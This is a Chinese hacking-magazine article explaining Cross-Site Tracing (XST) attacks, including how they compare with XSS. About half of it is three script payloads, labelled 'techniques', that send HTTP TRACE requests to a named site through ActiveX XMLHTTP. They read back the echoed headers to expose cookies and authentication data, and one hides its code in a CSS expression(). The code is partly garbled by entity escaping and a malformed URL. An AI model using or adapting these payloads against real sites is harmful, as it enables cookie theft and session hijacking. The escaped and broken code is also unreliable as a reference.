基础知识 XST攻击理论及手法讲解

出处: 黑客防线

XST攻击描述:

攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:

1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方;
3、目标站点存在跨域漏洞。

XST与XSS的比较:

相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。

优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:

 1<script script="" type="text/java">   
 2<!--   
 3function xssTRACE(){   
 4var xmlHttp=new ActiveXObject(\"Microsoft&#46;XMLHTTP\");   
 5xmlHttp&#46;open(\"TRACE\",\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\",false);   
 6xmlHttp&#46;send();   
 7xmlDoc=xmlHttp&#46;responseText;   
 8alert(xmlDoc);   
 9} 
10
11//-->   
12</script>

1<br/>

1<input onclick="xssTRACE();" trace\"="" type="button" value='\"XSS'/>

手法2:

 1<script script="" type="text/java">   
 2<!--   
 3function xssTRACE() {   
 4var openWin=open(\"blank&#46;htm\",\"swords\",\"width=500,height=400\");   
 5var otraceswords=openWin&#46;external;   
 6openWin&#46;location&#46;href=\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\";   
 7setTimeout(   
 8function () {   
 9//以下必须写在一行   
10otraceswords&#46;NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft&#46;XMLHTTP\");xmlHttp&#46;open(\"TRACE\",\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\",false);xmlHttp&#46;send();xmlDoc=xmlHttp&#46;responseText;alert(\"不用document&#46;cookie 显示站点wmjie&#46;51&#46;net/swords/ 的头信息。 \\\n\ " + xmlDoc);',\"\",\"\");   
11},   
121024   
13);   
14}   
15//-->   
16</script>

1<br/>

1<input onclick="xssTRACE();" trace\"="" type="button" value='\"XSS'/>

手法3:

1<script script="" type="text/java">   
2function xssTRACE(){   
3var swords = \"var xmlHttp = new ActiveXObject( \\\"Microsoft.XMLHTTP\\\")\;xmlHttp.open(\\\"TRACE\\\",\\\"[url]http://http://www.tingh.com/[/url]\\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\ ";   
4var target = \"[url]http://wmjie.51.net/swords/[/url]\";   
5spinach = encodeURIComponent(swords + ';top.close()');   
6var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';   
7showModalDialog(target, null, readyCode);   
8}   
9</script>

1<br/>

1<input onclick="xssTRACE()" trace\"="" type="button" value='\"XSS'/>

后记:研究阶段,希望能抛砖引玉,期望和您能够交流心得体会。

Published At
Categories with 网络技术
Tagged with
comments powered by Disqus